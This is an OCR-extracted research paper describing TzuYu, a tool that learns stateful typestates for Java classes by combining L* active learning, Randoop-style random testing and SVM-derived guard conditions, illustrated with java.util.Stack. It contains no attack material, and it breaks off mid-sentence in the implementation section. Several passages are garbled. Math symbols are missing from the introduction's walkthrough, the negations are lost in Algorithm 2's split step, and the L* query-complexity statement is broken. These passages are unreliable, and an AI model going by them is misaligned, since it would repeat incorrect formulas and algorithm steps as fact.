olmocr_science_pdfs
2024-12-08
2024-12-08
0a43f6080040df12d70b048a7df341e3203233de
TzuYu: Learning Stateful Typestates Hao Xiao*, Jun Sun*, Yang Liu†, Shang-Wei Lin† and Chengnian Sun‡ *Singapore University of Technology and Design †School of Computer Engineering, Nanyang Technological University ‡National University of Singapore Abstract—Behavioral models are useful for various software engineering tasks. They are, however, often missing in practice. Existing work either focuses on learning simple behavioral models such as finite-state automata, or relies on techniques (e.g., symbolic execution) to infer finite-state machines equipped with data states, referred to as stateful typestates. The former is often inadequate as finite-state automata lack expressiveness in capturing behaviors of data-rich programs, whereas the latter is often not scalable. In this work, we propose a fully automated approach to learn stateful typestates by extending the classic active learning process to generate transition guards (i.e., propositions on data states). The proposed approach has been implemented in a tool called TzuYu and evaluated against a number of Java programs. The evaluation results show that TzuYu is capable of learning correct stateful typestates efficiently. Index Terms—Typestate; Learning; Testing I. INTRODUCTION Behavioral models or specifications are useful for various software engineering tasks. For instance, (object) typestates [26], [11], [19], [9] are important for program debugging and verification. A precise (and preferably concise) typestate is useful for understanding third-party programs. In practice, however, such models are often inadequate and incomplete. To overcome this problem, learning based specification mining [4] was proposed to automatically generate behavioral models from various software artifacts, e.g., source code [2], execution traces [21] and natural language API documentations [29]. This approach is promising as it requires no extra user efforts. Existing approaches on learning typestates (also known as interface specification [3]) can be broadly categorized into two groups. One focuses on learning behavioral models in the forms of finite-state automata, without data states. These methods are often inadequate in practice, as it is known that finite-state automata lack expressiveness in modeling data-rich programs. Consider a simple example of a Stack class with two operations: push and pop. A typestate of the Stack should specify the following language: the number of push operations in any valid trace of the model must be no less than the number of pop operations. It is known that this language is irregular and therefore beyond the expressiveness of finite-state automata. On the other hand, the model of the Stack can be easily expressed using a finite-state machine with a guard condition on the pop operation: size $\geq 1$ where size denotes the number of items in the stack. The central issue is thus: how to identify the proposition size $\geq 1$ systematically and automatically. The other group learns stateful typestates using relatively heavy-weight techniques like SMT/SAT solving. For instance, in paper [3], the authors proposed to synthesize interface specification for Java classes based on predicate abstraction, which relies on theorem proving. Similarly, in paper [13], the authors propose to learn typestates through symbolic execution (which relies on SMT solving) and refinement. Given that existing theorem proving and SMT/SAT techniques are still limited in handling complicated data structures and control flows, these methods are often limited to small programs. In this paper, we propose an alternative approach to learning stateful typestates from Java programs. The key idea is to extend an active learning algorithm with an approach to automatically learning transition guards (i.e., propositions on data states). Our approach takes the source code of a class as the only input and generates a stateful typestate through a series of testing, learning and refinement. Fig. 1 shows the high level architecture of our approach. There are three main components. An active learner constructs a typestate based on the L* algorithm [5]. It drives the learning process by generating two kinds of queries. One is membership query, i.e., whether a sequence of events (i.e., a trace) of the current typestate is valid. The other is candidate query, i.e., whether a candidate typestate matches the ‘actual’ typestate. A tester acts as a teacher in the classic active learning setting. It takes queries from the learner and responds accordingly based on testing results. In the original L* algorithm, the model to be learned is a finite-state automaton and a trace can be either valid or invalid but never both. However, in our setting, it is possible that two executions have the same sequences of method calls on the same object but lead to different outcome (i.e., error or no-error), due to different inputs to the method calls (which in turn results in different data states). In such a case, alphabet refinement is performed, by splitting one event into multiple events, each of which has a different guard condition so that the traces are distinguished. The refiner in Fig. 1 is used to automatically identify proper guard conditions. In the following, we use a simple example to illustrate how our method works. We take the java.util.Stack class in Java (SE 1.4.2) as the running example. Without loss of generality, let us focus on the following two methods: push (which takes an object as an input) and pop, and one data field eleCount (inherited from the java.util.Vector class) which denotes the number of elements in the stack. Initially, we have an alphabet containing two events corresponding to the two methods. Given an instance of the Stack class, the learner generates a number of membership queries, i.e., a sequence of method calls. Given one membership query, the tester generates multiple test cases which have the same sequence of method calls (with different arguments) and answers the query. The queries and testing results are summarized in the observation table referred to details in Section II-B, as shown in Fig. 2 (a) where the empty sequence of method calls; and denote the sequence of calling after pop. The 0s in column denote that all tests generated for the sequence and then result in an exception or assertion failure (hereafter failure). The 1s denote that none of the tests result in failure. Based on the observation table, the learner generates a candidate typestate as presented in Fig. 2 (b). Note that the typestate is a finite-state automaton with one accepting state, i.e., state A. Next, the learner asks a candidate query, i.e., is the typestate in Fig. 2 (b) the right typestate? The tester takes the candidate typestate and performs random walking, i.e., randomly generates a set of tests which correspond to traces of the typestate. Notice that a trace of the typestate is either accepting (i.e., ending with an accepting state) or otherwise. Through the random walking, the tester identifies one inconsistency between the typestate and the class under analysis. That is, the typestate predicated that calling from state A always results in failure, whereas it is not always the case. For instance, calling method first (which leads to state A) and then results in no failure. The existence of inconsistency suggests that the typestate must be refined. We collect data states of the stack at state A before calling method and partition them into two sets, i.e., ones which lead to failure after invoking pop and the rest. Next, the refiner is consulted to generate a proposition such that all data objects in the first set satisfy while all the rest violate . The technique used by the refiner is based on Support Vector Machines (SVMs) [23]. In the above example, the generated proposition is . Next, we re-start the learning process with an alphabet which contains three events: push, and . Then, the condition is satisfied. After a series of membership queries, the learner constructs the observation table as shown in Fig. 3 (a). Notice that all tests corresponding to result in no failure and therefore it is marked 1 in the table. A new candidate typestate is then generated from the table, as shown in Fig. 3 (b). The tester performs random walking again and finds no inconsistency. We then present Fig. 3 (b) as the resultant typestate after some simple bookkeeping on Fig. 3 (b) by transforming to using the fact that is integer). The novelty of our approach is on integrating a refiner in the active learning process so as to learn typestates for data-rich programs. In particular, by adopting techniques from machine learning community, we are able to automatically generate propositions for alphabet refinement. The refiner acts as an abstract mapper between the learner and the class under analysis. Compared with existing techniques on finding the right proposition (e.g., [13]), our approach is more scalable as it avoids SMT/SAT encoding and solving. Furthermore, to learn concise stateful typestates efficiently, we investigate the interplay between learning and refinement and develop an algorithm which avoids re-starting learning when alphabet refinement occurs. The method has been implemented in a tool named TzuYu and our experiments show that TzuYu is able to learn meaningful and concise typestates efficiently. The remainder of the paper is organized as follows. Section II presents preliminary introduction to the concepts and techniques used in our approach. Section III presents the details of our approach. Section IV presents details on the implementation of TzuYu and Section V evaluates its performance with experiments. Section VI discusses related work. Section VII concludes the paper. II. PRELIMINARIES In this section we formalize the definitions related to stateful typestate and introduce the techniques used in our approach. A. Definitions The input to our method is a Java class (e.g., the Stack class) which is constituted by a set of instance variables (which could 1Who is commonly known as the best student of Confucius. be objects of other classes) and methods. In this work, we fix one object of the given class as the main receiver and inspect behaviors of all instances of the class through this object. An object state is the status of the object, i.e., the valuation of its variables. For each object, there is an initial object state, i.e., the initial valuation of the variables². A method is a function which takes one object state and returns a new one. A concrete execution ex of an object is a finite sequence \[ ex = (o_0, m_0(\overline{p_0}), o_1, m_1(\overline{p_1}), \ldots, o_k, m_k(\overline{p_k}), o_{k+1}) \] where \(o_1\) is an object state and \(m_i(\overline{p_i})\) is a method call with concrete arguments \(\overline{p_i}\). A failed execution is an execution which results in exception or assertion failure. A successful execution is one which does not fail. The output of our method is a stateful typestate, which is a variant of the deterministic finite-state automaton. **Definition 1:** A deterministic finite-state automaton (hereafter DFA) is a tuple \(D = (S, \Sigma, \text{init}, \rightarrow, F)\) such that \(S\) is a finite set of states; \(\text{init} \in S\) is an initial state; \(\Sigma\) is an alphabet; \(\rightarrow: S \times \Sigma \rightarrow S\) is a transition function and \(F \subseteq S\) is a set of accepting states. A trace of \(D\) is a sequence \(tr = (s_0, e_1, s_1, \ldots, s_n, e_n, s_{n+1})\) such that \(s_0 = \text{init}\) and \((s_i, e_i, s_{i+1}) \in \rightarrow\) for all \(i\), \(tr\) is accepting if \(s_{n+1} \in F\). Otherwise, it is non-accepting. The language of \(D\) is the set of all accepting traces of \(D\). In an abuse of notation, we write \(s \xrightarrow{e} s'\) to denote that trace \(tr\) from state \(s\) leads to state \(s'\) and write \(tr(s)\) to denote \(s'\). For two traces \(tr_0\) and \(tr_1\), we write \(tr_0 \cdot tr_1\) to denote their concatenation. **Definition 2:** A (stateful) typestate of a Java class is a tuple \(T = (\text{Prop}, \text{Meth}, D)\) such that \(\text{Prop}\) is a set of propositions, which are Boolean expressions over variables in the class; \(\text{Meth}\) is the set of method names in the class; \(D = (S, \Sigma, \text{init}, \rightarrow, F)\) is a DFA such that \(\Sigma \subseteq \text{Prop} \times \text{Meth}\). In the Stack example, a proposition in \(\text{Prop}\) can be constituted by \text{eleCount}, \text{capacity} (inherited from Vector), any data field of \text{elementData} (e.g., \text{elementData.length}), etc. Set \(\text{Meth}\) contains \text{push} and \text{pop}. By definition, typestates are deterministic in this work. Notice that an event in \(\Sigma\) is a pair, i.e., a guard condition \(g\) in \(\text{Prop}\) and a method name \(m\) in \(\text{Meth}\). For brevity, a transition is written as \((s, [g]e, s')\). A typestate abstracts all executions of an object of the class. In particular, a trace \(tr = (s_0, [g_0]e_0, s_1, [g_1]e_1, s_2, \ldots, s_n, [g_n]e_n, s_{n+1})\) is an abstraction of the concrete execution \(ex\) above if they have the same sequence of methods (i.e., \(e_i = m_i\) for all \(i\)) and all the guard conditions are satisfied (i.e., \(g_i\) is satisfied by \(o_1\) and method arguments \(\overline{p_i}\) for all \(i\)). We denote the set of concrete executions of \(tr\) as \(\text{con}(tr)\). Given an execution \(ex\) and an alphabet \(\Sigma\), we can obtain the corresponding trace, denoted as \(\text{abs}(ex)\), by testing which proposition in \(\text{Prop}\) is satisfied for every method call in \(ex\). A typestate \(D\) is said to be safe (or sound), if for every accepting trace \(tr\) of \(D\), every execution in \(\text{con}(tr)\) is successful. It is complete if for every concrete execution \(ex\) of the class, there is an accepting trace \(tr\) such that \(ex \in \text{con}(tr)\). **B. The \(L^*\) Algorithm** The learner extends the original \(L^*\) algorithm [5] with lazy alphabet refinement, which is introduced latter in section III-C. In the following we introduce the original \(L^*\) algorithm. The \(L^*\) algorithm assumes that the system to be learned \(D\) is in the form of DFA with a fixed alphabet \(\Sigma\) and learns a DFA with the minimal number of states that accepts the same language of \(D\). During the learning process, the \(L^*\) algorithm interacts with a Minimal Adequate Teacher (teacher for short) by asking two types of queries: membership queries and candidate queries. A membership query asks whether a trace \(tr\) is a trace of \(D\), whereas a candidate query asks whether a DFA \(C\) is equivalent to \(D\), i.e., \(C\) and \(D\) have the same language. During the learning process, the \(L^*\) algorithm stores the membership query results in an observation table \((P, E, T)\) where \(P \subseteq \Sigma^*\) is a set of prefixes; \(E \subseteq \Sigma^*\) is a set of suffixes; and \(T\) is a mapping function such that \(T(tr, tr') = 1\) if \(tr\) is a trace in \(P\) or a prefix in \(P\) attached with an event in \(\Sigma\); and \(tr'\) is a trace in \(E\) and \(tr \cdot tr'\) is a trace of the system; otherwise, \(T(tr, tr') = 0\). In the observation table, the \(L^*\) algorithm categorizes traces based on Myhill-Nerode Congruence [15]. **Definition 3:** We say two traces \(tr\) and \(tr'\) are equivalent, denoted by \(tr \equiv tr'\), if \(tr \cdot \rho\) is a trace of \(S\) iff \(tr' \cdot \rho\) is a trace of \(S\), for all \(\rho \in \Sigma^*\). Under the equivalence relation, we can say \(tr\) and \(tr'\) are the representing trace of each other with respect to \(S\), denoted by \(tr = [tr']\), and \(tr' = [tr]\). The \(L^*\) algorithm always tries to make the observation table closed and consistent with membership queries. An observation table is closed if for all \(tr \in P\) and \(e \in \Sigma\), there always exists \(tr' \in P\) such that \(tr \cdot e \equiv tr'\). An observation table is consistent if for every two elements \(tr, tr' \in P\) such that \(tr \equiv tr'\), then \((tr \cdot e) \equiv (tr' \cdot e)\) for all \(e \in \Sigma\). If the observation table \((P, E, T)\) is closed and consistent, the \(L^*\) algorithm constructs a corresponding candidate DFA \(C = (S, \text{init}, \Sigma, \rightarrow, F)\) such that - \(S\) contains one state for each trace in \(P\); notice that equivalent traces in \(P\) correspond to the same state. - \(\text{init}\) is the state corresponding to the empty trace \(\epsilon\); - for any state \(s\) in \(S\) which corresponds to a trace \(tr\) and \(e \in \Sigma\), \((s, e, s') \in \rightarrow\), where \(s'\) is the state for the trace \([tr \cdot e]\), in \(P\); - a state \(s\) is in \(F\) iff the corresponding trace \(tr\) satisfies \(T(tr) = 1\). Subsequently, \(L^*\) raises a candidate query on whether \(C\) is equivalent to the system to be learned. If \(C\) is equivalent to the system, \(C\) is returned as the learning result. Otherwise, the teacher identifies a counterexample, say \(tr\), which is then analyzed to find a witness suffix. A witness suffix is a trace that, when appended to the two traces, provides enough evidence for the two traces to be classified into two equivalence classes under the Myhill-Nerode Congruence. Let \( tr \) be the concatenation of two traces \( tr_0 \) and \( tr_1 \), i.e., \( tr_0 \cdot tr_1 = tr \). Let \( s \) be the state reached from state \( init \) via trace \( tr_0 \), i.e., \( init \xrightarrow{tr_0} s \). \( tr_1 \) is the witness suffix of \( tr \), denoted by \( WS(tr) \), if \( s \) and \( D(tr) \). Once the witness suffix \( WS(\sigma_{ce}) \) is obtained, \( L^* \) uses \( WS(\sigma_{ce}) \) to refine the candidate DFA \( C \) until \( C \) is equivalent to the system. Angluin [5] proved that as long as the unknown language \( U \) is regular, the \( L^* \) algorithm will learn an equivalent minimal DFA with at most \( n - 1 \) candidate queries and \( O(\log n) \) membership queries, where \( m \) is the length of the longest counterexample returned by the teacher and \( n \) is the number of states of the minimal DFA. **Example 1**: We again use the Stack example to illustrate how \( L^* \) works and also why it does not work when the target class cannot be captured by a DFA. After a series of membership queries, \( L^* \) constructs the first candidate DFA, as shown in Fig. 2 (b), and performs a candidate query for the DFA. The teacher answers “no” with a positive counterexample \((push, pop)\), which should be included into the behavior of the candidate. After analyzing the counterexample, the witness suffix \((pop)\) is added into the set of suffixes \( E \) of the observation table, and the closed observation table is shown in Fig. 4 (a). Based on the observation table, \( L^* \) constructs the second candidate DFA, as shown in Fig. 4 (b), and performs a candidate query for the candidate. The teacher answers “no” again with another positive counterexample \((push, push, pop, pop)\). This time, the witness suffix \((pop, pop)\) is added into the set of suffixes \( E \) of the observation table, and the closed observation table is shown in Fig. 5 (a). Based on the observation table, \( L^* \) constructs the third candidate DFA, as shown in Fig. 5 (b), and performs a candidate query for the third one. The reader may find that after the \( i \)-th candidate query for \( i \in \mathbb{N} \), there is always a witness suffix \((pop)^i\) showing that the candidate DFA is incorrect, and one additional state will be added to the candidate DFA, which makes the \( L^* \) learning process non-terminating. ## III. Detailed Approach In this section we first introduce the detailed design of the tester and refiner and then introduce the learner which interacts with the tester and learner to learn the typestate. ### A. The Tester The tester acts as the teacher for \( L^* \) algorithm. Ideally, given a membership query for a trace \( tr \), the teacher should answer either yes or no. Since \( tr \) can be mapped into a set of concrete executions \( con(tr) \), that is to say that the teacher should answer yes iff all executions in \( con(tr) \) are successful and answer no iff all executions in \( con(tr) \) are failed. Similarly, given a candidate query, the tester should answer yes iff the candidate typestate is safe and complete. Having a perfect teacher in our setting is infeasible for two main reasons. Firstly, the set \( con(tr) \) is infinite (with different arguments for method calls) in general and hence checking whether all executions in \( con(tr) \) are successful or not is highly non-trivial. Secondly, it could be that some executions in \( con(tr) \) are successful, whereas some are failed. For instance, assume the class given is \( java.util.Vector \) and \( tr \) is \( \langle addAll \rangle \). A concrete execution with a method call \( addAll \) and argument \( null \) results in exception, whereas a non-null argument results in success. We tackle the former problem by using guided random testing as the teacher, as we discuss below. The latter problem is solved by alphabet refinement, as we show in Section III-B. In the following, we show how the tester is used as a teacher for membership queries and candidate queries. Given a membership query \( tr \) as follows: \[ tr = \langle s_0, [g_0]m_0, s_1, [g_1]m_1, s_2, \cdots, s_n, [g_n]m_n, s_{n+1} \rangle \] the tester’s task is to identify multiple concrete executions as follows: \( \langle o_0, m_1(p_1^0), o_2, m_2(p_2^0), \cdots, o_k, m_k(p_k^0), o_{k+1} \rangle \). In other words, to automatically generate the arguments for all method calls such that all guard conditions \( g_i \) are satisfied. This task is in general highly non-trivial and requires techniques like SAT/SMT solving. In the name of scalability, we instead apply testing techniques for argument generation. In particular, the approach of Randoop [20] is adopted. In the following, we briefly introduce the idea and refer readers to details in [20]. Given \( tr \), we generate arguments for every method call one-by-one in sequence. Given a typed parameter, the idea is to randomly generate a value from a pool of type-compatible values. This pool composes of a set of pre-defined value (e.g., a random integer for an integer type, \( null \) or an object with the default object state for a user-defined class, etc.) but also type-compatible objects that have been generated during the testing process. We remark that in order to re-create the same object, we associate each object with the execution which produces the object state. Given one value for each parameter, we then evaluate whether $g_i$ is true or not. If $g_i$ is true, we proceed with next method call. There are four possible outcomes of the random testing. If all tests are successful, the answer to the query is yes, i.e., $tr$ should be an accepting trace. If all tests are failed, the answer is no, i.e., $tr$ should be a non-accepting trace. If there are both successful tests and failed tests (for $tr$ or a prefix of $tr$), the tests are passed to the refiner for alphabet refinement as we show later. Lastly, due to the limitation of random testing (i.e., the price we pay to avoid theorem proving), it is possible that some guard condition $g_i$ is not satisfied by the generated arguments. In other words, we fail to find any concrete execution in $con(tr)$. In such a case, we optimistically answer yes so that the resultant typestate is more permissive. To answer a candidate query with a typestate $C$, we use random walk [16], [8], [7] to generate a suite of test cases. Note that the approach of Randooop [20] is again used. Test cases which are inconsistent with the typestates are collected into two sets: positive counterexamples and negative counterexamples. A positive counterexample is a successful test whose corresponding trace $tr$ is non-accepting. A negative example is a failed test whose corresponding trace $tr$ is accepting. If both sets are empty, we answer the query with a yes, i.e., the typestate is the final output. If either of the two sets is not empty, the typestate is ‘invalid’ and a counterexample must be presented to the learner. In the original L* algorithm, presenting any of the counterexample will do. It is however more complicated in our setting as we show below. For each state $s$ in the typestate $C$, we identify a set of executions in the test suite which end at the state, denoted as $E_s$. For each $e \in \Sigma$, we extend each execution in $E_s$ with a method call corresponding to $e$ and obtain a new set denoted as $E_s^e$. If all of the executions result in failure whereas a transition labeled with $e$ from $s$ leads to an accepting state in $C$, the tester reports that $C$ is invalid and picks one execution in $E_s^e$ and presents its corresponding abstract trace as a counterexample. Similarly, if all of the executions are successful, whereas a transition labeled with $e$ from $s$ leads to a non-accepting state, the tester presents a counterexample. Lastly, if some of the executions in $E_s^e$ result in failure and others result in success, the refiner is consulted to perform alphabet refinement. B. The Refiner There are two different scenarios when the refiner is consulted. One is with a membership query $tr$ and a set of tests in $con(tr)$ such that for some of the executions (denoted as $T^-$), performing the last method call (with the generated arguments) results in failure, whereas for the rest of the executions (denoted as $T^+$), performing the last call results in success. In this case, alphabet refinement is a must as all the tests have the same trace $tr$ and therefore they cannot be distinguished without alphabet refinement. Given an execution in $T^-$ or $T^+$, we can obtain a data state pair $(o, \overline{P})$ where $o$ is the object state of the main instance prior to the last method call and $\overline{P}$ is the list of arguments of the last method call. Let $O^-$ be the set of all pairs we collect from executions in $T^-$ and $O^+$ be the set of all pairs we collect from executions in $T^+$. Intuitively, there must be something different between $O^-$ and $O^+$ such that $T^-$ fails and $T^+$ succeeds. The refiner’s job is to find a divider, in the form of a proposition, such that $O^-$ and $O^+$ can be distinguished. Formally, a divider for $O^+$ and $O^-$ is a proposition $\phi$ such that for all $o \in O^+$, $o$ satisfies $\phi$ and for all $o' \in O^-$, and $o'$ does not satisfy $\phi$. From another point of view, there must be some invariant for all object states in $O^+$ (denoted as $inv^+$) and some invariant for all object states in $O^-$ (denoted as $inv^-$) such that $inv^+$ implies $\phi$ and $inv^-$ implies the negation of $\phi$. The refiner in our work is based on techniques developed by machine learning community, in particular, Support Vector Machines (SVMs) [23]. SVM is a supervised machine learning algorithm for classification and regression analysis. We use its binary classification functionality. Mathematically, the binary classification functionality of SVMs works as follows. Given two data states (say $O^+$ and $O^-$), each of which can be viewed as a vector of numerical values (e.g., floating-point numbers), it tries to find a separating hyperplane $\Sigma_{i=1}^{n} c_i x_i = c$ such that (1) for every positive data state $(p_1, p_2, \ldots, p_n) \in O^+$ such that $\Sigma_{i=1}^{n} c_i p_i > c$ and (2) for every negative data state $(m_1, m_2, \ldots, m_n) \in O^-$ such that $\Sigma_{i=1}^{n} c_i m_i < c$. As long as $O^+$ and $O^-$ are linear separable, SVM is guaranteed to find a separating hyperplane, even if the invariants $inv^+$ and $inv^-$ may not be linear. Furthermore, there are usually more than one hyperplane that can separate $O^+$ from $O^-$. In this work, we choose the optimal margin classifier (see the definition in [25]) if possible. This separating hyperplane could be seen as the strongest witness why the two data states are different. In order to use SVM to generate dividers, each element in $O^+$ or $O^-$ must be casted into a vector of numerical types. In general, there are both numerical type (e.g., int) and categorical type (e.g., String) variables in Java programs. Thus, we need a systematic way of mapping arbitrary object states to numerical values so as to apply SVM techniques. Furthermore, the inverse mapping is also important to feedback the SVM results to the original program. Our approach is to systematically generate a numerical value graph from each object type and apply SVM techniques to values associated with nodes in the graph level-by-level. We illustrate our approach using an example in the following. Fig. 6 shows part of the numerical value graph for type Stack (where many data fields have been omitted for readability). A rectangle (with round corners) represents a categorical type, whereas a circle associated with the type denotes a numerical value which can be extracted from the type. Notice that a categorical type is always associated with a Boolean type value which is true iff the object is null. An edge reads as “contains”. For instance, a Stack type contains an object of type “Array” (i.e., elementData), which in turn contains objects of type “Object”. For readability, each edge is labeled with an abbreviated variable name and each node is labeled with the type. To obtain a vector of numerical values from a type, we traverse through the graph level-by-level to collect numerical values associated with each type. In general, the graph could be huge if a type contains many variables. For the purpose of typestate learning, however, it is often sufficient to look at only the top few levels. In the following, we demonstrate how the graph is used. Assume the last event of the membership query is \( \text{true} \implies \text{pop} \) and the two sets of object states are \( O^+ \) and \( O^- \) prior to the method call. Given the receiver object of the method call is a Stack, the refiner first abstracts \( O^+ \) and \( O^- \) using level-0 numerical values in the graph, i.e., \( \text{isNull}, \text{eleCount}, \text{increment} \) and \( \text{increment} \) which is the amount by which the capacity of the vector is automatically incremented when its size becomes greater than its capacity, inherited from the Vector class. Next, the refiner tries to generate a divider which separates the abstracted \( O^+ \) from that of \( O^- \). Assume that \( O^+ \) contains two object states and the abstracted \( O^+ \) is a set: \( \{ (0, 1, 1), (0, 2, 1) \} \) where \( (0, 1, 1) \) denotes a Stack object which is not null (i.e., \( 0 \) means that \( \text{isNull} \) is false), with \( \text{eleCount} \) being 1 and with \( \text{increment} \) being 1. Assume that the abstracted \( O^- \) is: \( \{ (0, 0, 1), (0, 0, 1) \} \). SVM finds a divider \( \text{receiver.eleCount} \geq 1 \). Notice that if there does not exist a linear divider, the refiner refines the abstraction of \( O^+ \) and \( O^- \) by using numerical values from next level in the graph (i.e., \( \text{isNull} \) for \( \text{data} \) and \( \text{length} \) of \( \text{data} \)) and tries again to find a divider. Intuitively, the reason that we look for a divider level-by-level is that we believe that the reason why calling the same method leads to different results is more likely related to the values of variables directly defined in the class and less likely nested in its referenced data variables. The other scenario where the refiner is consulted is with a candidate query \( C \) and a set of executions which end in the same state in \( C \). Furthermore, extending the executions with a method call corresponding to an event \( e \) would result in failure or success. Similar to the case of a membership query, for each execution we obtain a pair \( (o, \overline{p}) \) where \( o \) is the object state of the main instance prior to the last method call and \( \overline{p} \) is the arguments of the last method call. Similarly, we collect two sets of those pairs \( O^+ \) (from those successful executions) and \( O^- \) (from those failed executions). Afterwards, SVM is invoked to generate a divider for alphabet refinement. C. The Learner The learner drives the learning process and interacts with both the tester and refiner. It uses an algorithm which extends the \( \text{L}^* \) algorithm [5] with lazy alphabet refinement. In general, a typestate for a program often requires more expressiveness than DFA and therefore the \( \text{L}^* \) algorithm itself is not sufficient. We solve this problem by extending the \( \text{L}^* \) algorithm with (lazy) alphabet refinement, i.e., by introducing propositions on object states into the alphabet. The details on the extended \( \text{L}^* \) algorithm are presented in the following. 1) \( \text{L}^* \) with Lazy Alphabet Refinement: When the refiner generates a divider \( \phi \), an event \( e \) (which is the event calling some method under certain condition) is effectively divided into two: \( [\phi]e \) and \( [\neg \phi]e \). With a modified alphabet, previous learning results are invalidated and therefore learning needs to be re-started. However, re-starting from scratch is costly, as we often need multiple rounds of alphabet refinement. In the following, we show how to extend the \( \text{L}^* \) algorithm with lazy alphabet refinement so as to re-use previous learning results as much as possible. Algorithm 1 shows the pseudo-code of the \( \text{L}^* \) algorithm with lazy alphabet refinement, where \( Q_m(tr) \) denotes the membership query of a trace \( tr \) and \( Q_m(D) \) denotes the candidate query of a typestate \( D \). There are two cases where the alphabet refinement will take place: (1) If a membership query triggers the generation of a divider \( \phi \) (lines 5, 15, 31), some alphabet \( e \in \Sigma \) needs to be split into \( [\phi]e \) and \( [\neg \phi]e \), which calls Algorithm 2 to refine the alphabet and update the corresponding results of the membership queries. (2) A candidate query may also trigger the generation of a divider \( \phi \) (line 24). If so, Algorithm 2 is also called to refine the alphabet and update the corresponding results of the membership queries in the observation table. We use the Stack example to illustrate the \( \text{L}^* \) algorithm with lazy alphabet refinement. Initially, the alphabet is \( \Sigma = \{ \text{push}, \text{pop} \} \). After a series of memberships, Algorithm 1 constructs the first candidate typestate, as shown in Fig. 2 (b), based on the closed and consistent observation table shown in Fig. 2 (a). A candidate query for the first typestate is performed, and the refiner returns a proposition \( \text{eleCount} \geq 1 \) for the positive counterexample \( \langle \text{pop} \rangle \). The event \( \text{pop} \) is split into two events: \( [\text{eleCount} \geq 1] \text{pop} \) and \( [!\text{eleCount} \geq 1] \text{pop} \), and the \( \text{L}^* \) learning process is started from the scratch. Without lazy alphabet refinement, all the membership queries over the new alphabet \( \Sigma' = \{ \text{push}, \text{eleCount} \geq 1 \} \) have to be queried, as shown in the observation table in Fig. 7. However, with lazy alphabet refinement, only the membership queries marked with a * symbol in the observation table have to be queried. In this small example, only two membership queries are reduced. This is because the alphabet only consists of two events. In real-world examples, the number of alphabet is usually big, and the number of membership queries that can be reduced is significant. The final typestate learned by Algorithm 1 is shown in Fig. 3 (b). IV. TzuYu Implementation We have implemented our approach in a tool named TzuYu, which has more than 20K lines of Java code and can be downloaded from the web site [28]. In this section, we discuss the challenges and remedies in implementing the proposed method. We first employ reflection to collect relevant information like fields and methods of each class so as to construct a numerical value graph for each class. The graph of a type depends on those of the referenced types and hence potentially many types may be referenced. Not all types are useful for the purpose of generating dividers and therefore we filter types like Thread and Exception and high level interfaces such as Serializable. The methods defined in the target class identify the initial alphabet for the learner. Afterwards, the learner starts to generate membership queries and candidate queries according to Algorithm 1. Given a membership query, the tester checks whether this abstract trace is feasible or not by generating a number (which is configurable) of executions and uses reflection to run them. During the execution, the tester saves the runtime states of the arguments of the trace through instrumentation. For argument generation, we developed a just-in-time approach, i.e., generate the required arguments just before executing a method. Some of the chosen arguments may fail the guard condition, and then we choose another argument which can pass the guard condition. If there is no argument satisfying the condition, we generate another set of arguments until the guard condition evaluates to true (or a bound is reached). We skip the algorithm for the just-in-time generation of arguments. Informally, an argument can be obtained from three sources, i.e., randomly generated from a set of pre-defined type compatible values; selected from existing executions that generate type compatible variables; or selected from type compatible out-referenced variables generated by the current execution. The above recursive argument creation procedure for constructors may not terminate if a constructor has a parameter of the same type as itself. We set a maximum depth of the recursive constructor call in such cases as did in [17]. Before executing of each method call, we store the object states of the receiver and the arguments as a instrumented state. We remark that saving the object state for later usage is not easy in general because its class may not implement Serializable or Cloneable interface. We thus implement a mockup mechanism similar to the standard clone mechanism in Java to save the runtime object into a mockup object whose tree like class structure resembles the class structure of the original object. The mechanism differs from the standard clone mechanism in that only primitive type values of the object are saved. For reference type field we construct another mockup object as its saved value. These mockup objects can be used by --- **Algorithm 1** L* Algorithm with Lazy Alphabet Refinement 1. Let \( P = E = \{()\} \) 2. for \( e \in \Sigma \cup \{()\} \) do 3. Update \( T \) by \( Q_m(e) \) 4. if \( e \) needs to be split then 5. Split(\( \Sigma, e, (P, E, T) \)) 6. end if 7. end for 8. while true do 9. while there exists \( tr \cdot \langle e \rangle \) where \( tr \in P \) and \( e \in \Sigma \) such that \( tr \cdot \langle e \rangle \neq tr' \) for all \( tr' \in P \) do 10. \( P \leftarrow P \cup \{tr \cdot \langle e \rangle\} \) 11. for \( e \in \Sigma \) do 12. \( tr'' \leftarrow tr \cdot \langle e \rangle \cdot \langle \sigma \rangle \) 13. Update \( T \) by \( Q_m(tr'') \) 14. if there is some \( e' \in \Sigma \) needs to be split then 15. Split(\( \Sigma, e', (P, E, T) \)) 16. end if 17. end for 18. end while 19. Construct candidate typestate \( D \) from \( (P, E, T) \) 20. if \( Q_m(D) = 1 \) then 21. return \( D \) 22. else 23. if there is some \( e' \in \Sigma \) needs to be split then 24. Split(\( \Sigma, e', (P, E, T) \)) 25. end if 26. \( v \leftarrow WS(\sigma_{ce}) \quad \triangleright \sigma_{ce} \) is a counterexample 27. \( E \leftarrow E \cup \{v\} \) 28. for \( tr \in P \) and \( e \in \Sigma \) do 29. Update \( T \) by \( Q_m(tr \cdot \langle v \rangle) \) and \( Q_m(tr \cdot \langle \sigma \rangle \cdot \langle v \rangle) \) 30. if there is some \( e' \in \Sigma \) needs to be split then 31. Split(\( \Sigma, e', (P, E, T) \)) 32. end if 33. end if 34. end if 35. end while --- **Algorithm 2** Split 1. Let \( \phi \) be divider given by the Refiner to refine \( e \) 2. \( \Sigma \leftarrow \Sigma \cup \{[\phi]e, [\phi]e \setminus \{e\}\} \) 3. if \( p \in P \) or \( q \in E \) has a substring \( \langle e \rangle \) then 4. split \( p \) into \( p_1 \) and \( p_2 \) such that \( p_1 \) has the substring \( [\phi]e \) and \( p_2 \) has the substring \( [\phi]e \) 5. split \( q \) into \( q_1 \) and \( q_2 \) such that \( q_1 \) has the substring \( [\phi]e \) and \( q_2 \) has the substring \( [\phi]e \) 6. Update \( T \) by \( Q_m(p_i \cdot q_i) \) for all \( i \in \{1, 2\} \) 7. end if --- **Fig. 7.** The observation table generated by the lazy L* algorithm. the refiner. If however the real object is needed, for instance, to generate a new test, we record the exact sequence of statements whose execution creates the object that can then be used to “clone” the arguments later by re-executing them. Given a candidate query, the tester generates a number of tests from the typestate. The default number (which is configurable) is twenty multiplied with the maximum length of traces generated in membership queries before this candidate query. Each testing trace is generated by depth first random walking on the typestate up to a fixed length, the length of the trace is set to two plus the maximum length of traces generated during membership queries. Due to randomness in random testing and random walking, a test case generated previously may not appear again later. To ensure the learning process is improving always (and hopefully converging), we store all the generated test cases so as to provide consistent answers. Notice that we do not store the instrumented states of the test case to reduce memory consumption and we re-execute the test case to create the states when they 